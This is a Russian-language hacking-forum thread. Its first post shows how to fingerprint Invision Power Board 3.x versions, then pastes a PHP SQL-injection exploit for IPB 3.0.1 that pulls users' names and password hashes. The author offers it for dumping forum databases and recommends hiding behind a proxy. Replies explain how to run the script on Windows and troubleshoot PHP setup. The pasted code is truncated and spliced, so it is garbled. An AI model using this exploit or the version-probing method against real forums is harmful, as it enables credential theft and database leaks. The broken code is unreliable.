все мы знаем как определить версию ipb 2.3.5-2.3.6 (визуально)
но с 3+ все гораздо сложнее казалось бы ведь они все на одно лицо. так вот. все очень просто. идем по такому пути
ваш_сайт/форум/адмика/admin/install/index.php
пример [Ссылки могут видеть только зарегистрированные пользователи. ]
админка может называться не admin. в интернете есть куча софта по определению адреса админки.
к чему я это все написал. в некоторых версиях ипб есть уязвимости но без точной версии использовать их крайне сложно.
вот пример эксплоита под ipb 3.0.1
PHP код:
<?php
error_reporting(E_ALL);
//////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB 3.0.1 sql injection exploit
// Version 1.0
// written by Cryptovirus
// http://de.crypt.in/
// 31. january 2010
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. log format compatible with passwordspro
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//================================================== ===================
$cli = php_sapi_name() === 'cli';
//================================================== ===================
// Die, if executed from webserver
//================================================== ===================
if(!$cli)
{
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Error!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "This script will not run through a webserver.<br />\n";
echo "</center></body></html>\n";
exit;
}
//================================================== ===================
// Print the awesome de.crypt.in logo
//================================================== ===================
echo "\n _ _ _ ";
echo "\n __| | ___ ___ _ __ _ _ _ __ | |_ (_)_ __ ";
echo "\n / _` |/ _ \ / __| '__| | | | '_ \| __| | | '_ \ ";
echo "\n| (_| | __/| (__| | | |_| | |_) | |_ _| | | | |";
echo "\n \__,_|\___(_)___|_| \__, | .__/ \__(_)_|_| |_|";
echo "\n |___/|_| \n\n";
//================================================== ===================
// Check if all command line arguments were passed
//================================================== ===================
if(!isset($argv[1])||!isset($argv[2])||!isset($argv[3])){
echo "Usage: php ".$_SERVER['PHP_SELF']." <target> <userid> <option> [login] [password]\n";
echo "\n";
echo "NOTE: Login and password are optional, use for forums that require registration.\n";
echo "Options: 1 - Fetch username, 2 - Fetch password hash\n\n";
echo "Example: php ".$_SERVER['PHP_SELF']." http://ipb.com/board/ 1 1 foo bar\n";
die;
}
//================================================== ===================
// Set some important variables...
//================================================== ===================
$topicname = '';
$url = $argv[1];
$chosen_id = $argv[2];
$ch_option = $argv[3];
if(isset($argv[4])){
if(isset($argv[5])){
$user_login = $argv[4];
$user_pass = $argv[5];
}
else{
echo "Error: Password not specified with username\n";
die;
}
}
# Proxy settings
# Be sure to use proxy
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipb_log.txt'; //Log file
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url;
global $topicname;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'app=core&module=search§ion=search&do=quick_search&search_app=core&fromsearch=1&search_filter_app%%5Ball%%5D=1&content_title_only=1&search_term='.$topicname.'%%2527 IN BOOLEAN MODE) AND %s AND MATCH(t.title) AGAINST(%%2527'.$topicname;
$post = sprintf($pattern, $p);
Примечание если вы увидите надпись 3.0 то это версия 3.0.х (скорее всего 3.0.1) и 3.1 это 3.1.х (скорее всего 3.1.4)
данные приведены на основе форумов в л2топ
тема оригинальна. специально для zhyk.ru
з.ы. размещена в этом разделе так как имеет непосредственное отношение ко сливу баз. просьба если тема актуальна добавить ее в список полезных статей для слива баз. при копирайте указуйте автора плж
Re: определяем версию форума ipb 3+. эксплоит 3.0.1
Скачали [Ссылки могут видеть только зарегистрированные пользователи. ]
Поставили и получилось допустим так C:\PHP\php.exe
Берем скрипт и сохраняем его в формате .php, допустим script.php
Запускаем cmd: C:\PHP\php.exe C:\PHP\script.php [Ссылки могут видеть только зарегистрированные пользователи. ] 1 1 log pas
Re: определяем версию форума ipb 3+. эксплоит 3.0.1
Добавлено через 2 минуты
Цитата:
Сообщение от wildking
Скачали [Ссылки могут видеть только зарегистрированные пользователи. ]
Поставили и получилось допустим так C:\PHP\php.exe
Берем скрипт и сохраняем его в формате .php, допустим script.php
Запускаем cmd: C:\PHP\php.exe C:\PHP\script.php [Ссылки могут видеть только зарегистрированные пользователи. ] 1 1 log pas
C:\Users\ренат>C:\php\php.exe
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_gd2.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mbstring.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_mysqli.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/php5/ext\p
hp_pdo_mysql.dll' - ═х эрщфхэ єърчрээ√щ ьюфєы№.
in Unknown on line 0
через денвер можно будет или не?
________________
skype sunches123666
Последний раз редактировалось sunches; 04.03.2011 в 10:22.
Причина: Добавлено сообщение
Re: определяем версию форума ipb 3+. эксплоит 3.0.1
Цитата:
Сообщение от wildking
Тут видимо фикс или версия не подходит, эксплоит не прокатит
Не видит библиотек, написано же
В php.ini надо смотреть, все ли с путями нормально (extension_dir)
ого extension_dir вообще нету такого
php.ini
log_errors=On
error_log="C:\windows\temp\php-errors.log"
extension_dir="C:\PHP\ext"
[PHP_BZ2]
extension=php_bz2.dll
у меня почему то не все устаналивается как я понял.
может все таки из-за ОС? win7 стоит. Хотя наврятли
________________
skype sunches123666
Последний раз редактировалось sunches; 04.03.2011 в 10:58.
Re: определяем версию форума ipb 3+. эксплоит 3.0.1
; Directory in which the loadable extensions (modules) reside.
extension_dir="C:\PHP\ext"
Про кавычки забыл )
И посмотри есть ли вообще в конфиге расширения. Видимо проще было инсталером ставить
Библиотеки то лежат хоть по месту назначения ?)
Если что попробуй [Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
Последний раз редактировалось wildking; 04.03.2011 в 11:35.
Re: определяем версию форума ipb 3+. эксплоит 3.0.1
Цитата:
Сообщение от wildking
; Directory in which the loadable extensions (modules) reside.
extension_dir="C:\PHP\ext"
Про кавычки забыл )
И посмотри есть ли вообще в конфиге расширения. Видимо проще было инсталером ставить
Библиотеки то лежат хоть по месту назначения ?)
Если что попробуй [Ссылки могут видеть только зарегистрированные пользователи. ]
чет намудрил я походу сылку на инстарллер дай.
Да один хер) ладно пофиг забью) не очень горит.
________________
skype sunches123666
Последний раз редактировалось sunches; 04.03.2011 в 11:49.